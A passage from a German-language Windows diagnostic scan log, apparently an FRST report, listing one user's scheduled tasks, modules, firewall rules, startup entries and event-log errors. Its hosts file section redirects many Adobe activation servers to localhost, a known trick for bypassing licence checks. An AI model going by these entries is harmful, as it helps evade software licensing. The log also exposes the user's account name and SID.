Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited) Task: {2D27F44F-F282-4720-8EE9-5F2F758217F1} - System32\Tasks\RtHDVBg_LENOVO_MICPKEY => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor) Task: {330E747B-8045-43D9-AE55-D4C6B8254107} - 
System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {38C1E477-9549-4F3A-A622-DB2BE844D3FC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {3E54759A-7D66-45F1-8D30-B4BDB68BB5F3} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe Task: {40F17ABB-21F3-4E9E-A06F-5CC9526E5080} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {46AE9F37-C558-4167-B4AA-AC736E9BCF40} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4C3A42E4-FB4F-40FE-9156-B276AA24C0BF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4F6CC665-D711-4615-BA99-3634BD84A3CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {57322CE1-EEEA-49A8-AFDE-2A814B78F3FF} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {5ADECB7F-4E8A-4A4A-8E48-B1A950E7EDF1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {6229F9D6-65C1-4C81-B563-A8A011EE91D8} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {69ED972F-0507-43E0-B842-4ACC4A4C636A} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {6B4326C0-4369-475B-9BD7-660E928B9078} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-06-02] (Lenovo) Task: {72F2B2FA-6B40-427A-B40D-AD19949718D5} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe [2016-04-18] (Adobe Systems Incorporated) Task: {7664EED0-BA9C-4AC1-BB8A-BE2EF3716B88} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => reg.exe add 
hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {7CF19C94-4370-4482-8B1C-31D7F80661CA} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {7F1D8057-FE69-4BE5-A7EC-D3EFD6DBEE01} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {82C043EC-E5CC-47E1-9692-0E00D829F248} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated) Task: {844ACD9E-BD7D-474F-8117-6D90173B21F2} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {8717EEF6-E532-4C6C-A532-CB26B350F2BF} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {8BD97214-F360-4555-B780-8E98A751D90A} - System32\Tasks\RtHDVBg_Dolby => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor) Task: {8E22DE0B-F51D-4116-A8E2-03F2E91E1B28} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-10-01] (Realtek Semiconductor) Task: {985B667F-5809-47FB-B953-0CE916B386C7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {99265848-09F9-4807-89BC-ADE8DED3AFE3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => Sc.exe START ImControllerService Task: {9B828E07-B816-4CD7-ADFA-1B5F9AD26442} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG Task: {9FB0B6E1-8348-4D3C-8907-4EDA7C5340A5} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {AE4B9823-9A54-4135-ABA7-B40C512E17A4} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.) 
Task: {AE8D0CF6-2EF8-4189-BE67-995466304543} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {B086AE79-0D9E-4FE2-8014-D2007FD55A9F} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b25dde1c-a139-4809-9f42-48306d3cf4b8 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited) Task: {B6057C25-D59A-4344-A92A-B2034A515A19} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {B977E6C5-B009-48BD-B2AA-DC32B1E763AF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe Task: {B9F5F195-100B-41F3-BF0C-58B05B9B4103} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-02-19] (Intel(R) Corporation) Task: {BB42B4FB-073D-45F9-A76B-1212343A6AC1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> Keine Datei <==== ACHTUNG Task: {C2546E5D-79C2-4541-9E39-E0D6ED7AAE71} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Keine Datei <==== ACHTUNG Task: {C5D88ED0-F2CC-4454-8C31-965F8FC0C2A0} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe Task: {C752F5F1-D27B-4954-AA2B-9C4E4500D357} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {CA3B4A87-99F8-4810-BF19-A18F1B3107DB} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {D35C04F6-8F88-4A03-8BA2-89159AC22A37} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Keine Datei <==== ACHTUNG Task: {D56A0AC7-5318-4063-BBFA-A316BB8376D3} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-06-02] (Lenovo) Task: {DFD6BAEA-857D-47A9-9549-63E9AC2DC5B7} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe 
Task: {E02EBA99-651C-441A-A6DF-AEF563A9822D} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-06-02] () Task: {E0FFE99A-6A7C-442F-AB93-8EB9D8109C61} - System32\Tasks\Lenovo\Lenovo Settings Power => Rundll32.exe "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.dll",PwrMgrBkGndMonitor Task: {E199183F-6CCA-42E0-8834-0B9241326AB6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {F6305F54-EAFE-4AFF-9F0F-1B9D0630DE8D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {FA52DB1A-7F2B-4BF0-81D5-DC5856B6BFE6} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\WINDOWS\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)" Task: {FE295463-A538-4E94-B586-9A9AEF092B99} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) 
ShortcutWithArgument: C:\Users\ararat\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\6fa8d4dcdac59e60\Chromium.lnk -> C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) -> --profile-directory=Default ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2016-02-11 20:38 - 2015-12-22 12:38 - 03180176 _____ () C:\Windows\system32\nvwmi64.exe 2016-02-15 22:01 - 2016-02-15 22:01 - 00031256 _____ () C:\WINDOWS\System32\us008lm.dll 2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-09-20 16:50 - 2017-04-28 08:03 - 00213880 _____ () C:\Program Files (x86)\ThinkPad\Utilities\GR\PWMRT64V.DLL 2016-02-13 16:12 - 2016-02-02 16:37 - 02570752 _____ () C:\Program Files\SRWare Iron (64-Bit)\libglesv2.dll 2016-02-13 16:12 - 2016-02-02 16:37 - 00087552 _____ () C:\Program Files\SRWare Iron (64-Bit)\libegl.dll 2016-04-21 18:33 - 2013-12-22 08:22 - 00047496 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll 2016-04-21 18:33 - 2013-12-22 08:22 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll 2016-02-25 21:38 - 2016-02-25 21:38 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) 
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) ==================== Hosts Inhalt: ========================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2016-02-23 23:08 - 2016-07-30 18:02 - 00003191 _____ C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 activate.adobe.com 127.0.0.1 adobe.activate.com 127.0.0.1 activate.adobe.de 127.0.0.1 adobeereg.com 127.0.0.1 hl2rcv.adobe.com 127.0.0.1 3dns.adobe.com 127.0.0.1 3dns-1.adobe.com 127.0.0.1 3dns-2.adobe.com 127.0.0.1 3dns-3.adobe.com 127.0.0.1 3dns-4.adobe.com 127.0.0.1 adobe-dns.adobe.com 127.0.0.1 adobe-dns-1.adobe.com 127.0.0.1 adobe-dns-2.adobe.com 127.0.0.1 adobe-dns-3.adobe.com 127.0.0.1 adobe-dns-4.adobe.com 127.0.0.1 adobe-dns-5.adobe.com 127.0.0.1 activate-sea.adobe.de 127.0.0.1 activate-sea.adobe.com 127.0.0.1 wwis-dubc1-vip60.adobe.de 127.0.0.1 activate-sjc0.adobe.de 127.0.0.1 activate-sjc0.adobe.com 127.0.0.1 activate.wip.adobe.com 127.0.0.1 activate.wip1.adobe.com 127.0.0.1 activate.wip2.adobe.com 127.0.0.1 activate.wip3.adobe.com 127.0.0.1 activate.wip4.adobe.com 127.0.0.1 activate.wip3.adobe.de 127.0.0.1 practivate.adobe 127.0.0.1 practivate.adobe.de 127.0.0.1 practivate.adobe.com Da befinden sich 48 zusätzliche Einträge. ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) 
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Control Panel\Desktop\\Wallpaper -> DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk" HKLM\...\StartupApproved\StartupFolder: => "Netzwerk Server.lnk" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run: => "NvBackend" HKLM\...\StartupApproved\Run: => "WindowsDefender" HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager" HKLM\...\StartupApproved\Run32: => "Dropbox" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "SwitchBoard" HKLM\...\StartupApproved\Run32: => "ADSKAppManager" HKLM\...\StartupApproved\Run32: => "IMSS" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
FirewallRules: [{653565DE-9382-4D0D-85FF-4568B9133C1E}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe FirewallRules: [UDP Query User{628701B0-B712-431B-9393-9A95979EDCD3}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe FirewallRules: [TCP Query User{F7353599-717C-48F1-A7C4-29EA353FB9EA}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe FirewallRules: [{792A37F2-D689-4DD6-8D2C-FBA7331805F4}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [{B791C512-BFC4-4770-9ECA-470BCC2A7DEE}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [UDP Query User{8B73BCF1-A27F-46FA-8493-FCAEC1304E80}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [TCP Query User{89173555-CB79-4375-8B44-776AD246B48C}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [{62792125-6600-4F0D-9E98-36AFFE88A65C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{0A1FDF08-88CB-46A6-A831-2C99CBD8CB46}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{DF579F84-82D2-4D87-AE46-8C50FEEADB09}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{E5FE0167-99D3-4174-B1EC-B4885B8F4350}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [TCP Query User{2F4AFE87-B42B-45E3-B554-1995154ED7F8}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{DA37DC8E-E6FD-4F94-8205-AD8E720DF402}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [{AA8607DB-7DDC-461E-A485-928A060249F7}] => (Allow) C:\Program 
Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe FirewallRules: [{88856880-8A4A-42AB-9D2E-30C799D2B9F1}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe FirewallRules: [{39C35EB4-AA50-466F-A4BF-3C59A7E3BA8C}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe FirewallRules: [{7926FF23-E4D1-454F-B88A-87D18A9AB988}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe FirewallRules: [{E9100150-1A9E-4657-BC50-714390476085}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{9CEAA83C-8F23-4BDB-BAFF-C8C84FEE4D81}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{CC90D6FE-8983-4889-9794-A14326787265}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [TCP Query User{FB492D07-7354-45CC-ADD9-E6AE207F9190}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{CCD8C032-9093-4911-BCD8-02465C75B061}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [{EA429A43-2FEC-4D6F-826C-06F17CCC0613}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe FirewallRules: [{20E60939-1FF9-49B8-A516-9542A3F2C33E}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe FirewallRules: [{28C60E63-767D-4518-A3D4-6123F4316D49}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe FirewallRules: [{9BF832A9-551A-4DF6-99CA-5002606D4197}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe FirewallRules: [{2D2FEEFE-0D55-4D31-BC23-46F39EBD0F58}] => (Allow) C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe FirewallRules: [{6353C606-2B4C-4737-BF11-4B5E18EBAF06}] => (Allow) 
C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe FirewallRules: [TCP Query User{E451C298-1596-4AD5-A4EE-B7F4F17C1071}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe FirewallRules: [UDP Query User{5D6F2A66-AF06-4682-A369-62305BA12C39}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe FirewallRules: [TCP Query User{1ACF387C-2C3D-49B0-B24B-F58F47F86A71}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe FirewallRules: [UDP Query User{5CF615D2-8196-4AEF-9F97-12FED9AA7D13}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe FirewallRules: [{1D081E8A-DD53-4FDB-B585-23585FFA1137}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{65AAA8A3-F502-43D1-8931-540CB11FCF00}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server ==================== Wiederherstellungspunkte ========================= 14-06-2017 20:31:05 Windows Update 20-06-2017 21:19:32 Windows Update 03-07-2017 02:01:02 Geplanter Prüfpunkt ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (07/02/2017 09:09:17 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951 Name des fehlerhaften Moduls: ntdll.dll, 
Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000003bbef ID des fehlerhaften Prozesses: 0x9f8 Startzeit der fehlerhaften Anwendung: 0x01d2f366b2d3f47c Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: 6bd68206-76e6-418c-bab1-aa186b69cf68 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/29/2017 10:07:42 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951 Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000003bbef ID des fehlerhaften Prozesses: 0xa2c Startzeit der fehlerhaften Anwendung: 0x01d2f1135d2f73eb Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: bd38a6ca-5ed4-42f0-be88-1ecd6890a6e2 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/28/2017 07:04:24 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: MsMpEng.exe, Version: 4.11.15063.0, Zeitstempel: 0x418969b3 Name des fehlerhaften Moduls: offreg.dll_unloaded, Version: 10.0.15063.168, Zeitstempel: 0xfaed1333 Ausnahmecode: 0xc0000005 Fehleroffset: 0x0000000000001440 ID des fehlerhaften Prozesses: 0x1088 Startzeit der fehlerhaften Anwendung: 0x01d2e54a788d7120 Pfad der fehlerhaften Anwendung: C:\Program Files\Windows Defender\MsMpEng.exe Pfad des fehlerhaften Moduls: offreg.dll Berichtskennung: 0a8d723a-7e31-4589-8105-733ccd81828d Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: 
Systemfehler: ============= Error: (07/04/2017 09:33:45 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/04/2017 09:33:45 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/04/2017 09:44:03 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. Error: (07/04/2017 09:44:02 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. 
Error: (07/04/2017 09:01:20 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/04/2017 09:01:20 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/03/2017 10:57:30 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
Error: (07/03/2017 10:57:30 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/03/2017 10:57:24 PM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. Error: (07/03/2017 10:57:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. CodeIntegrity: =================================== Date: 2017-07-03 01:25:38.548 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-06-28 